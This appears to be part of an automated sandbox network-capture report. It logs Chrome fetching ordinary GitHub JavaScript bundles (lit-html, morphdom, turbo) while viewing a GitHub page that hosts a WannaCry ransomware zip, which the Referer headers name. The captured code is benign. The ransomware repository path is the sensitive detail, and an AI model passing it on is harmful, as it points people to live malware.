                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 6e 65 77 20 50 72 6f 6d 69 73 65 28 28 74 2c 6e 29 3d 3e 7b 73 3d 73 65 6c 66 2e 73 65 74 54 69 6d 65 6f 75 74 28 28 29 3d 3e 6e 28 45 72 72 6f 72 28 22 74 69 6d 65 6f 75 74 22 29 29 2c 65 29 7d 29 3b 69 66 28 21 74 29 72 65 74 75 72 6e 20 6e 3b 74 72 79 7b 61 77 61 69 74 20 50 72 6f 6d 69 73 65 2e 72 61 63 65 28 5b 6e 2c 61 28 74 29 5d 29 7d 63 61 74 63 68 28 65 29 7b 74 68 72 6f 77 20 73 65 6c 66 2e 63 6c 65 61 72 54 69 6d 65 6f 75 74 28 73 29 2c 65 7d 7d 61 73 79 6e 63 20 66 75 6e 63 74 69 6f 6e 20 69 28 65 2c 74 29 7b 6c 65 74 20 73 3b 6c 65 74 20 6e 3d 6e 65 77 20 50 72 6f 6d 69 73 65 28 74 3d 3e 7b 73 3d 73 65 6c 66 2e 73 65 74 54 69 6d 65 6f 75 74 28 74 2c 65 29 7d 29 3b 69 66 28 21 74 29 72 65 74 75 72 6e 20 6e 3b 74 72 79 7b 61 77 61 69 74 20 50
                                                                                      Data Ascii: new Promise((t,n)=>{s=self.setTimeout(()=>n(Error("timeout")),e)});if(!t)return n;try{await Promise.race([n,a(t)])}catch(e){throw self.clearTimeout(s),e}}async function i(e,t){let s;let n=new Promise(t=>{s=self.setTimeout(t,e)});if(!t)return n;try{await P
                                                                                      2024-03-23 14:47:23 UTC1133INData Raw: 67 6e 28 7b 7d 2c 74 68 69 73 2e 70 6f 6c 69 63 79 29 2c 7b 73 69 67 6e 61 6c 3a 74 68 69 73 2e 6f 70 65 6e 69 6e 67 2e 73 69 67 6e 61 6c 7d 29 3b 74 72 79 7b 76 61 72 20 74 3b 74 68 69 73 2e 73 6f 63 6b 65 74 3d 61 77 61 69 74 20 28 74 3d 74 68 69 73 2e 75 72 6c 2c 72 28 28 29 3d 3e 6f 28 74 2c 65 2e 74 69 6d 65 6f 75 74 2c 65 2e 73 69 67 6e 61 6c 29 2c 65 2e 61 74 74 65 6d 70 74 73 2c 65 2e 6d 61 78 44 65 6c 61 79 2c 65 2e 73 69 67 6e 61 6c 29 29 7d 63 61 74 63 68 28 65 29 7b 74 68 69 73 2e 64 65 6c 65 67 61 74 65 2e 73 6f 63 6b 65 74 44 69 64 46 69 6e 69 73 68 28 74 68 69 73 29 3b 72 65 74 75 72 6e 7d 66 69 6e 61 6c 6c 79 7b 74 68 69 73 2e 6f 70 65 6e 69 6e 67 3d 6e 75 6c 6c 7d 74 68 69 73 2e 73 6f 63 6b 65 74 2e 6f 6e 63 6c 6f 73 65 3d 65 3d 3e 7b 76
                                                                                      Data Ascii: gn({},this.policy),{signal:this.opening.signal});try{var t;this.socket=await (t=this.url,r(()=>o(t,e.timeout,e.signal),e.attempts,e.maxDelay,e.signal))}catch(e){this.delegate.socketDidFinish(this);return}finally{this.opening=null}this.socket.onclose=e=>{v


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      27192.168.2.1649733185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:22 UTC677OUTGET /assets/vendors-node_modules_lit-html_lit-html_js-5b376145beff.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC689INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 16070
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 24 Oct 2023 17:57:35 GMT
                                                                                      ETag: 0x8DBD4BAB41AC2C2
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 2601061
                                                                                      X-Served-By: cache-iad-kiad7000150-IAD, cache-ewr18175-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 4608, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: 784d5c1e9784e2310e9269c737f8b0ab130653d5
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6c 69 74 2d 68 74 6d 6c 5f 6c 69 74 2d 68 74 6d 6c 5f 6a 73 22 5d 2c 7b 31 33 36 39 35 3a 28 74 2c 65 2c 69 29 3d 3e 7b 69 2e 64 28 65 2c 7b 58 3a 28 29 3d 3e 6e 2c 77 3a 28 29 3d 3e 72 7d 29 3b 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 20 54 68 65 20 50 6f 6c 79 6d 65 72 20 50 72 6f 6a 65 63 74 20 41 75 74 68 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 54 68 69
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_lit-html_lit-html_js"],{13695:(t,e,i)=>{i.d(e,{X:()=>n,w:()=>r});/** * @license * Copyright (c) 2017 The Polymer Project Authors. All rights reserved. * Thi
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 72 2e 67 69 74 68 75 62 2e 69 6f 2f 50 41 54 45 4e 54 53 2e 74 78 74 0a 20 2a 2f 6c 65 74 20 73 3d 76 6f 69 64 20 30 21 3d 3d 77 69 6e 64 6f 77 2e 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 26 26 76 6f 69 64 20 30 21 3d 3d 77 69 6e 64 6f 77 2e 63 75 73 74 6f 6d 45 6c 65 6d 65 6e 74 73 2e 70 6f 6c 79 66 69 6c 6c 57 72 61 70 46 6c 75 73 68 43 61 6c 6c 62 61 63 6b 2c 6e 3d 28 74 2c 65 2c 69 3d 6e 75 6c 6c 2c 73 3d 6e 75 6c 6c 29 3d 3e 7b 66 6f 72 28 3b 65 21 3d 3d 69 3b 29 7b 6c 65 74 20 69 3d 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 3b 74 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 65 2c 73 29 2c 65 3d 69 7d 7d 2c 72 3d 28 74 2c 65 2c 69 3d 6e 75 6c 6c 29 3d 3e 7b 66 6f 72 28 3b 65 21 3d 3d 69 3b 29 7b 6c 65 74 20 69 3d 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 3b
                                                                                      Data Ascii: r.github.io/PATENTS.txt */let s=void 0!==window.customElements&&void 0!==window.customElements.polyfillWrapFlushCallback,n=(t,e,i=null,s=null)=>{for(;e!==i;){let i=e.nextSibling;t.insertBefore(e,s),e=i}},r=(t,e,i=null)=>{for(;e!==i;){let i=e.nextSibling;
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 75 62 2e 69 6f 2f 41 55 54 48 4f 52 53 2e 74 78 74 0a 20 2a 20 54 68 65 20 63 6f 6d 70 6c 65 74 65 20 73 65 74 20 6f 66 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 61 74 0a 20 2a 20 68 74 74 70 3a 2f 2f 70 6f 6c 79 6d 65 72 2e 67 69 74 68 75 62 2e 69 6f 2f 43 4f 4e 54 52 49 42 55 54 4f 52 53 2e 74 78 74 0a 20 2a 20 43 6f 64 65 20 64 69 73 74 72 69 62 75 74 65 64 20 62 79 20 47 6f 6f 67 6c 65 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65 20 70 6f 6c 79 6d 65 72 20 70 72 6f 6a 65 63 74 20 69 73 20 61 6c 73 6f 0a 20 2a 20 73 75 62 6a 65 63 74 20 74 6f 20 61 6e 20 61 64 64 69 74 69 6f 6e 61 6c 20 49 50 20 72 69 67 68 74 73 20 67 72 61 6e 74 20 66 6f 75 6e 64 20 61 74 0a 20 2a 20 68 74 74 70 3a 2f 2f 70 6f 6c 79 6d 65 72 2e
                                                                                      Data Ascii: ub.io/AUTHORS.txt * The complete set of contributors may be found at * http://polymer.github.io/CONTRIBUTORS.txt * Code distributed by Google as part of the polymer project is also * subject to an additional IP rights grant found at * http://polymer.
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 3d 74 7d 61 70 70 65 6e 64 49 6e 74 6f 28 74 29 7b 74 68 69 73 2e 73 74 61 72 74 4e 6f 64 65 3d 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 28 30 2c 61 2e 49 57 29 28 29 29 2c 74 68 69 73 2e 65 6e 64 4e 6f 64 65 3d 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 28 30 2c 61 2e 49 57 29 28 29 29 7d 69 6e 73 65 72 74 41 66 74 65 72 4e 6f 64 65 28 74 29 7b 74 68 69 73 2e 73 74 61 72 74 4e 6f 64 65 3d 74 2c 74 68 69 73 2e 65 6e 64 4e 6f 64 65 3d 74 2e 6e 65 78 74 53 69 62 6c 69 6e 67 7d 61 70 70 65 6e 64 49 6e 74 6f 50 61 72 74 28 74 29 7b 74 2e 5f 5f 69 6e 73 65 72 74 28 74 68 69 73 2e 73 74 61 72 74 4e 6f 64 65 3d 28 30 2c 61 2e 49 57 29 28 29 29 2c 74 2e 5f 5f 69 6e 73 65 72 74 28 74 68 69 73 2e 65 6e 64 4e 6f 64 65 3d 28 30 2c 61 2e 49 57 29 28 29 29 7d 69 6e 73
                                                                                      Data Ascii: =t}appendInto(t){this.startNode=t.appendChild((0,a.IW)()),this.endNode=t.appendChild((0,a.IW)())}insertAfterNode(t){this.startNode=t,this.endNode=t.nextSibling}appendIntoPart(t){t.__insert(this.startNode=(0,a.IW)()),t.__insert(this.endNode=(0,a.IW)())}ins
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 74 65 72 61 62 6c 65 28 74 29 7b 6c 65 74 20 65 3b 41 72 72 61 79 2e 69 73 41 72 72 61 79 28 74 68 69 73 2e 76 61 6c 75 65 29 7c 7c 28 74 68 69 73 2e 76 61 6c 75 65 3d 5b 5d 2c 74 68 69 73 2e 63 6c 65 61 72 28 29 29 3b 6c 65 74 20 69 3d 74 68 69 73 2e 76 61 6c 75 65 2c 73 3d 30 3b 66 6f 72 28 6c 65 74 20 6e 20 6f 66 20 74 29 76 6f 69 64 20 30 3d 3d 3d 28 65 3d 69 5b 73 5d 29 26 26 28 65 3d 6e 65 77 20 4e 6f 64 65 50 61 72 74 28 74 68 69 73 2e 6f 70 74 69 6f 6e 73 29 2c 69 2e 70 75 73 68 28 65 29 2c 30 3d 3d 3d 73 3f 65 2e 61 70 70 65 6e 64 49 6e 74 6f 50 61 72 74 28 74 68 69 73 29 3a 65 2e 69 6e 73 65 72 74 41 66 74 65 72 50 61 72 74 28 69 5b 73 2d 31 5d 29 29 2c 65 2e 73 65 74 56 61 6c 75 65 28 6e 29 2c 65 2e 63 6f 6d 6d 69 74 28 29 2c 73 2b 2b 3b 73 3c
                                                                                      Data Ascii: terable(t){let e;Array.isArray(this.value)||(this.value=[],this.clear());let i=this.value,s=0;for(let n of t)void 0===(e=i[s])&&(e=new NodePart(this.options),i.push(e),0===s?e.appendIntoPart(this):e.insertAfterPart(i[s-1])),e.setValue(n),e.commit(),s++;s<
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 74 20 65 78 74 65 6e 64 73 20 41 74 74 72 69 62 75 74 65 50 61 72 74 7b 7d 3b 6c 65 74 20 64 3d 21 31 3b 74 72 79 7b 6c 65 74 20 74 3d 7b 67 65 74 20 63 61 70 74 75 72 65 28 29 7b 72 65 74 75 72 6e 20 64 3d 21 30 2c 21 31 7d 7d 3b 77 69 6e 64 6f 77 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 74 2c 74 29 2c 77 69 6e 64 6f 77 2e 72 65 6d 6f 76 65 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 74 65 73 74 22 2c 74 2c 74 29 7d 63 61 74 63 68 28 74 29 7b 7d 6c 65 74 20 45 76 65 6e 74 50 61 72 74 3d 63 6c 61 73 73 20 45 76 65 6e 74 50 61 72 74 7b 63 6f 6e 73 74 72 75 63 74 6f 72 28 74 2c 65 2c 69 29 7b 74 68 69 73 2e 76 61 6c 75 65 3d 76 6f 69 64 20 30 2c 74 68 69 73 2e 5f 5f 70 65 6e 64 69 6e 67 56 61 6c 75 65 3d 76 6f 69 64 20 30
                                                                                      Data Ascii: t extends AttributePart{};let d=!1;try{let t={get capture(){return d=!0,!1}};window.addEventListener("test",t,t),window.removeEventListener("test",t,t)}catch(t){}let EventPart=class EventPart{constructor(t,e,i){this.value=void 0,this.__pendingValue=void 0
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 74 78 74 0a 20 2a 20 54 68 65 20 63 6f 6d 70 6c 65 74 65 20 73 65 74 20 6f 66 20 61 75 74 68 6f 72 73 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 61 74 0a 20 2a 20 68 74 74 70 3a 2f 2f 70 6f 6c 79 6d 65 72 2e 67 69 74 68 75 62 2e 69 6f 2f 41 55 54 48 4f 52 53 2e 74 78 74 0a 20 2a 20 54 68 65 20 63 6f 6d 70 6c 65 74 65 20 73 65 74 20 6f 66 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 61 74 0a 20 2a 20 68 74 74 70 3a 2f 2f 70 6f 6c 79 6d 65 72 2e 67 69 74 68 75 62 2e 69 6f 2f 43 4f 4e 54 52 49 42 55 54 4f 52 53 2e 74 78 74 0a 20 2a 20 43 6f 64 65 20 64 69 73 74 72 69 62 75 74 65 64 20 62 79 20 47 6f 6f 67 6c 65 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65 20 70 6f 6c 79 6d 65 72 20 70 72 6f 6a 65 63 74 20 69 73 20 61 6c 73
                                                                                      Data Ascii: txt * The complete set of authors may be found at * http://polymer.github.io/AUTHORS.txt * The complete set of contributors may be found at * http://polymer.github.io/CONTRIBUTORS.txt * Code distributed by Google as part of the polymer project is als
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 2c 7b 6a 3a 28 29 3d 3e 54 65 6d 70 6c 61 74 65 52 65 73 75 6c 74 7d 29 2c 69 28 36 36 39 32 31 29 3b 76 61 72 20 73 3d 69 28 36 30 35 36 30 29 3b 2f 2a 2a 0a 20 2a 20 40 6c 69 63 65 6e 73 65 0a 20 2a 20 43 6f 70 79 72 69 67 68 74 20 28 63 29 20 32 30 31 37 20 54 68 65 20 50 6f 6c 79 6d 65 72 20 50 72 6f 6a 65 63 74 20 41 75 74 68 6f 72 73 2e 20 41 6c 6c 20 72 69 67 68 74 73 20 72 65 73 65 72 76 65 64 2e 0a 20 2a 20 54 68 69 73 20 63 6f 64 65 20 6d 61 79 20 6f 6e 6c 79 20 62 65 20 75 73 65 64 20 75 6e 64 65 72 20 74 68 65 20 42 53 44 20 73 74 79 6c 65 20 6c 69 63 65 6e 73 65 20 66 6f 75 6e 64 20 61 74 0a 20 2a 20 68 74 74 70 3a 2f 2f 70 6f 6c 79 6d 65 72 2e 67 69 74 68 75 62 2e 69 6f 2f 4c 49 43 45 4e 53 45 2e 74 78 74 0a 20 2a 20 54 68 65 20 63 6f 6d 70
                                                                                      Data Ascii: ,{j:()=>TemplateResult}),i(66921);var s=i(60560);/** * @license * Copyright (c) 2017 The Polymer Project Authors. All rights reserved. * This code may only be used under the BSD style license found at * http://polymer.github.io/LICENSE.txt * The comp
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 4c 49 43 45 4e 53 45 2e 74 78 74 0a 20 2a 20 54 68 65 20 63 6f 6d 70 6c 65 74 65 20 73 65 74 20 6f 66 20 61 75 74 68 6f 72 73 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 61 74 0a 20 2a 20 68 74 74 70 3a 2f 2f 70 6f 6c 79 6d 65 72 2e 67 69 74 68 75 62 2e 69 6f 2f 41 55 54 48 4f 52 53 2e 74 78 74 0a 20 2a 20 54 68 65 20 63 6f 6d 70 6c 65 74 65 20 73 65 74 20 6f 66 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 6d 61 79 20 62 65 20 66 6f 75 6e 64 20 61 74 0a 20 2a 20 68 74 74 70 3a 2f 2f 70 6f 6c 79 6d 65 72 2e 67 69 74 68 75 62 2e 69 6f 2f 43 4f 4e 54 52 49 42 55 54 4f 52 53 2e 74 78 74 0a 20 2a 20 43 6f 64 65 20 64 69 73 74 72 69 62 75 74 65 64 20 62 79 20 47 6f 6f 67 6c 65 20 61 73 20 70 61 72 74 20 6f 66 20 74 68 65 20 70 6f 6c 79 6d 65 72 20 70 72 6f 6a 65 63
                                                                                      Data Ascii: LICENSE.txt * The complete set of authors may be found at * http://polymer.github.io/AUTHORS.txt * The complete set of contributors may be found at * http://polymer.github.io/CONTRIBUTORS.txt * Code distributed by Google as part of the polymer projec
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 69 6e 73 65 72 74 42 65 66 6f 72 65 28 69 2c 74 29 2c 74 68 69 73 2e 70 61 72 74 73 2e 70 75 73 68 28 7b 74 79 70 65 3a 22 6e 6f 64 65 22 2c 69 6e 64 65 78 3a 2b 2b 70 7d 29 7d 22 22 3d 3d 3d 6e 5b 61 5d 3f 28 73 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 28 29 2c 74 29 2c 69 2e 70 75 73 68 28 74 29 29 3a 74 2e 64 61 74 61 3d 6e 5b 61 5d 2c 63 2b 3d 61 7d 7d 65 6c 73 65 20 69 66 28 38 3d 3d 3d 74 2e 6e 6f 64 65 54 79 70 65 29 7b 69 66 28 74 2e 64 61 74 61 3d 3d 3d 73 29 7b 6c 65 74 20 65 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 3b 28 6e 75 6c 6c 3d 3d 3d 74 2e 70 72 65 76 69 6f 75 73 53 69 62 6c 69 6e 67 7c 7c 70 3d 3d 3d 64 29 26 26 28 70 2b 2b 2c 65 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 68 28 29 2c 74 29 29 2c 64 3d 70 2c 74 68 69 73 2e 70 61 72 74
                                                                                      Data Ascii: insertBefore(i,t),this.parts.push({type:"node",index:++p})}""===n[a]?(s.insertBefore(h(),t),i.push(t)):t.data=n[a],c+=a}}else if(8===t.nodeType){if(t.data===s){let e=t.parentNode;(null===t.previousSibling||p===d)&&(p++,e.insertBefore(h(),t)),d=p,this.part


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      28192.168.2.1649734185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC686OUTGET /assets/vendors-node_modules_morphdom_dist_morphdom-esm_js-5bff297a06de.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
                                                                                      Referer: https://github.com/chronosmiki/RANSOMWARE-WANNACRY-2.0/blob/master/Ransomware.WannaCry.zip
                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                      Accept-Language: en-US,en;q=0.9
                                                                                      2024-03-23 14:47:23 UTC688INHTTP/1.1 200 OK
                                                                                      Connection: close
                                                                                      Content-Length: 4930
                                                                                      Cache-Control: public, max-age=31536000, immutable
                                                                                      Content-Type: application/javascript
                                                                                      Last-Modified: Tue, 24 Oct 2023 17:57:35 GMT
                                                                                      ETag: 0x8DBD4BAB41FED15
                                                                                      Server: Windows-Azure-Blob/1.0 Microsoft-HTTPAPI/2.0
                                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                                      Accept-Ranges: bytes
                                                                                      Date: Sat, 23 Mar 2024 14:47:23 GMT
                                                                                      Age: 2540196
                                                                                      X-Served-By: cache-iad-kcgs7200087-IAD, cache-ewr18161-EWR
                                                                                      X-Cache: HIT, HIT
                                                                                      X-Cache-Hits: 2681, 1
                                                                                      Vary: Accept-Encoding
                                                                                      Cross-Origin-Resource-Policy: cross-origin
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                      X-Fastly-Request-ID: f7e9d3e77d223cf00900668204930580e7e02e30
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 3d 67 6c 6f 62 61 6c 54 68 69 73 2e 77 65 62 70 61 63 6b 43 68 75 6e 6b 7c 7c 5b 5d 29 2e 70 75 73 68 28 5b 5b 22 76 65 6e 64 6f 72 73 2d 6e 6f 64 65 5f 6d 6f 64 75 6c 65 73 5f 6d 6f 72 70 68 64 6f 6d 5f 64 69 73 74 5f 6d 6f 72 70 68 64 6f 6d 2d 65 73 6d 5f 6a 73 22 5d 2c 7b 33 39 34 39 32 3a 28 65 2c 74 2c 6e 29 3d 3e 7b 6e 2e 64 28 74 2c 7b 5a 3a 28 29 3d 3e 70 7d 29 3b 76 61 72 20 61 2c 72 2c 69 3d 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 64 6f 63 75 6d 65 6e 74 3f 76 6f 69 64 20 30 3a 64 6f 63 75 6d 65 6e 74 2c 6f 3d 21 21 69 26 26 22 63 6f 6e 74 65 6e 74 22 69 6e 20 69 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 65
                                                                                      Data Ascii: "use strict";(globalThis.webpackChunk=globalThis.webpackChunk||[]).push([["vendors-node_modules_morphdom_dist_morphdom-esm_js"],{39492:(e,t,n)=>{n.d(t,{Z:()=>p});var a,r,i="undefined"==typeof document?void 0:document,o=!!i&&"content"in i.createElement("te
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 73 65 28 29 29 29 6f 3d 28 6e 3d 6f 29 2e 66 69 72 73 74 43 68 69 6c 64 3b 65 6c 73 65 7b 69 66 28 22 4f 50 54 49 4f 4e 22 3d 3d 3d 61 29 7b 69 66 28 6f 2e 68 61 73 41 74 74 72 69 62 75 74 65 28 22 73 65 6c 65 63 74 65 64 22 29 29 7b 72 3d 69 3b 62 72 65 61 6b 7d 69 2b 2b 7d 28 6f 3d 6f 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 7c 7c 21 6e 7c 7c 28 6f 3d 6e 2e 6e 65 78 74 53 69 62 6c 69 6e 67 2c 6e 3d 6e 75 6c 6c 29 7d 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 3d 72 7d 7d 7d 3b 66 75 6e 63 74 69 6f 6e 20 66 28 29 7b 7d 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 69 66 28 65 29 72 65 74 75 72 6e 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 28 22 69 64 22 29 7c 7c 65 2e 69 64 7d 76 61 72 20 6d 3d 28 72 3d 66 75
                                                                                      Data Ascii: se()))o=(n=o).firstChild;else{if("OPTION"===a){if(o.hasAttribute("selected")){r=i;break}i++}(o=o.nextSibling)||!n||(o=n.nextSibling,n=null)}e.selectedIndex=r}}};function f(){}function s(e){if(e)return e.getAttribute&&e.getAttribute("id")||e.id}var m=(r=fu
                                                                                      2024-03-23 14:47:23 UTC1378INData Raw: 3d 3d 3d 6e 2e 63 68 69 6c 64 72 65 6e 4f 6e 6c 79 2c 56 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 6e 75 6c 6c 29 2c 77 3d 5b 5d 3b 66 75 6e 63 74 69 6f 6e 20 49 28 65 29 7b 77 2e 70 75 73 68 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 2c 74 2c 6e 29 7b 21 31 21 3d 3d 79 28 65 29 26 26 28 74 26 26 74 2e 72 65 6d 6f 76 65 43 68 69 6c 64 28 65 29 2c 55 28 65 29 2c 66 75 6e 63 74 69 6f 6e 20 65 28 74 2c 6e 29 7b 69 66 28 31 3d 3d 3d 74 2e 6e 6f 64 65 54 79 70 65 29 66 6f 72 28 76 61 72 20 61 3d 74 2e 66 69 72 73 74 43 68 69 6c 64 3b 61 3b 29 7b 76 61 72 20 72 3d 76 6f 69 64 20 30 3b 6e 26 26 28 72 3d 54 28 61 29 29 3f 49 28 72 29 3a 28 55 28 61 29 2c 61 2e 66 69 72 73 74 43 68 69 6c 64 26 26 65 28 61 2c 6e 29 29 2c 61 3d 61 2e 6e 65 78 74 53 69 62 6c
                                                                                      Data Ascii: ===n.childrenOnly,V=Object.create(null),w=[];function I(e){w.push(e)}function P(e,t,n){!1!==y(e)&&(t&&t.removeChild(e),U(e),function e(t,n){if(1===t.nodeType)for(var a=t.firstChild;a;){var r=void 0;n&&(r=T(a))?I(r):(U(a),a.firstChild&&e(a,n)),a=a.nextSibl
                                                                                      2024-03-23 14:47:23 UTC796INData Raw: 64 2c 73 3d 6f 3b 63 6f 6e 74 69 6e 75 65 20 65 7d 72 3f 49 28 72 29 3a 50 28 73 2c 74 2c 21 30 29 2c 73 3d 6f 7d 69 66 28 61 26 26 28 75 3d 56 5b 61 5d 29 26 26 6c 28 75 2c 66 29 29 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 75 29 2c 65 28 75 2c 66 29 3b 65 6c 73 65 7b 76 61 72 20 76 3d 67 28 66 29 3b 21 31 21 3d 3d 76 26 26 28 76 26 26 28 66 3d 76 29 2c 66 2e 61 63 74 75 61 6c 69 7a 65 26 26 28 66 3d 66 2e 61 63 74 75 61 6c 69 7a 65 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 69 29 29 2c 74 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 66 29 2c 66 75 6e 63 74 69 6f 6e 20 74 28 6e 29 7b 53 28 6e 29 3b 66 6f 72 28 76 61 72 20 61 3d 6e 2e 66 69 72 73 74 43 68 69 6c 64 3b 61 3b 29 7b 76 61 72 20 72 3d 61 2e 6e 65 78 74 53 69 62 6c 69 6e 67 2c 69 3d 54 28
                                                                                      Data Ascii: d,s=o;continue e}r?I(r):P(s,t,!0),s=o}if(a&&(u=V[a])&&l(u,f))t.appendChild(u),e(u,f);else{var v=g(f);!1!==v&&(v&&(f=v),f.actualize&&(f=f.actualize(t.ownerDocument||i)),t.appendChild(f),function t(n){S(n);for(var a=n.firstChild;a;){var r=a.nextSibling,i=T(


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      29192.168.2.1649731185.199.109.1544436264C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-03-23 14:47:23 UTC694OUTGET /assets/vendors-node_modules_github_turbo_dist_turbo_es2017-esm_js-c91f4ad18b62.js HTTP/1.1
                                                                                      Host: github.githubassets.com
                                                                                      Connection: keep-alive
                                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                      Origin: https://github.com
                                                                                      sec-ch-ua-mobile: ?0
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                      sec-ch-ua-platform: "Windows"
                                                                                      Accept: */*
                                                                                      Sec-Fetch-Site: cross-site
                                                                                      Sec-Fetch-Mode: cors
                                                                                      Sec-Fetch-Dest: script
